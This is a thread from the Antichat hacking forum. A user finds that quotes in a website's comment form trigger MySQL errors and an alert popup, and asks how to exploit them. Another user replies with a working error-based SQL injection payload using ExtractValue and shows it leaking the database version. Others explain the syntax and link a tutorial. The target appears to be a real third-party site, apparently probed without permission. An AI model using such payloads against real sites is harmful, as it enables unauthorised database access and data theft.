Форум АНТИЧАТ - Уязвимость в отправке комментария

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)

- - Уязвимость в отправке комментария (https://forum.antichat.xyz/showthread.php?t=476325)

0xd098d0b3d0

23.03.2020 11:38

Если вставить кавычку в комментарий, на сайте

И отправить, то выдает вот это

Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/admin/web//public_html/inc/add_comment.php on line 47

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'asdf asdfas dfad sf' and site_id='0'' at line 1

Причем, если вставить alert, то он выдаст его в отдельном окошке.

Вопрос, можно ли раскрутить, или это просто отображается ошибка

WallHack

23.03.2020 15:44

Это error based

Код:

Code:

fgggggggggggggg' ||(ExtractValue(1,concat(0x3a,(select(version())))))#

Вверху: XPATH syntax error: ':5.5.60-log'

0xd098d0b3d0

23.03.2020 20:53

Цитата:

Сообщение от WallHack

WallHack said:
↑
Это error based

Код:

Code:

fgggggggggggggg' ||(ExtractValue(1,concat(0x3a,(select(version())))))#

Вверху:
XPATH syntax error: ':5.5.60-log
'

Если не сложно, можно небольшую расшифровочку.

Я так понимаю, что текст до кавычки, это чтобы обойти проверку на длинну комментария, дальше идет ExtractValue, как оно взаимодействует? и зачем решетка в конце строки. Остальное понятно.

kris990

24.03.2020 12:59

http://www.securityidiots.com/Web-P...XPATH-Error-Based-Injection-Extractvalue.html

# - comment

Время: 20:57